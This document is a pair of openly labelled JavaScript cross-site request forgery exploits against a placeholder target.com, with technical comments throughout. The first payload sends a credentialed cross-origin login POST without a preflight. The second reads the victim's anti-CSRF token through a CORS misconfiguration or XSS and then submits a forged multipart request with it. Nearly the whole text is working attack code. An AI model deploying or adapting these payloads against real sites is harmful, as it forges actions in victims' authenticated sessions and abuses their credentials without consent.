XHR CSRF exploit

Without an anti-CSRF token and with a regular (application/x-www-form-urlencoded) form:

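// Blind CSRF against a login form that has no anti-CSRF token.
// A cross-origin XHR whose Content-Type is CORS-safelisted is a "simple
// request": the browser sends it without a preflight, so the server receives
// it even though the response is never readable from the attacker origin.
var target = "https://target.com";
var params = "username=myUsername&password=myPassword";

var xhr = new XMLHttpRequest();
// async (true): synchronous XHR on the main thread is deprecated and the
// result is not readable cross-origin anyway, so there is nothing to wait for.
xhr.open("POST", target, true);
// Without this the browser strips the victim's cookies from a cross-origin
// request; the POST would arrive unauthenticated and the CSRF would do nothing.
xhr.withCredentials = true;
// XHR sends a string body as text/plain by default, which a form handler will
// not parse as fields. form-urlencoded is still CORS-safelisted (no preflight).
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// NOTE(review): browsers that default cookies to SameSite=Lax omit the session
// cookie on a cross-site POST unless it was set with SameSite=None; Secure.
xhr.send(params);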

With an anti-CSRF token check and a multipart/form-data form (this variant must first read the token out of the target's page, which the Same-Origin Policy forbids cross-origin: it only works against a CORS misconfiguration that reflects the attacker origin with credentials, or from script already running on the target origin, e.g. via XSS):

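var target = "https://target.com";

// Parses the fetched page and returns the value of the anti-CSRF token field.
// DOMParser yields an inert document: unlike assigning innerHTML on a live
// element, nothing in the (untrusted) response can trigger subresource loads
// or inline event handlers while it is being parsed.
// Throws when the field is absent, which is also what an unreadable (CORS-
// blocked, hence empty) response looks like.
function extractToken(html) {
  var doc = new DOMParser().parseFromString(html, "text/html");
  var field = doc.querySelector("#token");
  if (field === null) {
    throw new Error("no #token field in response: page not readable cross-origin, or wrong selector");
  }
  return field.value;
}

// Submits the form as multipart/form-data together with the harvested token.
function postWithToken(token) {
  // FormData produces an RFC 7578 body (CRLF separators, browser-chosen
  // boundary) and sets the Content-Type header itself. The hand-written body
  // this replaces used bare LF line endings, which strict parsers reject.
  // multipart/form-data is CORS-safelisted, so still no preflight.
  var body = new FormData();
  body.append("username", "myUsername");
  body.append("password", "myPassword");
  body.append("token", token);

  var post = new XMLHttpRequest();
  post.open("POST", target, true);
  post.withCredentials = true; // attach the victim's session cookie
  post.onload = function () {
    // Only readable when the target's CORS policy permits it; the request
    // itself has already landed either way.
    console.log(post.status, post.responseText);
  };
  post.send(body);
}

// Step 1: fetch the page that carries the token, with the victim's cookies so
// the token is the one bound to their session.
// CAVEAT: responseText is non-empty cross-origin only if the target answers
// with Access-Control-Allow-Origin echoing this origin plus
// Access-Control-Allow-Credentials: true (a CORS misconfiguration), or if this
// script runs on the target origin itself. Otherwise the browser fires
// `error`, status stays 0 and responseText is "".
var tokenReq = new XMLHttpRequest();
tokenReq.open("GET", target, true);
tokenReq.withCredentials = true;
tokenReq.onload = function () {
  if (tokenReq.status !== 200) {
    throw new Error("token fetch failed: HTTP " + tokenReq.status);
  }
  postWithToken(extractToken(tokenReq.responseText));
};
tokenReq.onerror = function () {
  throw new Error("token fetch blocked (network error or CORS denied the response)");
};
tokenReq.send(null);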
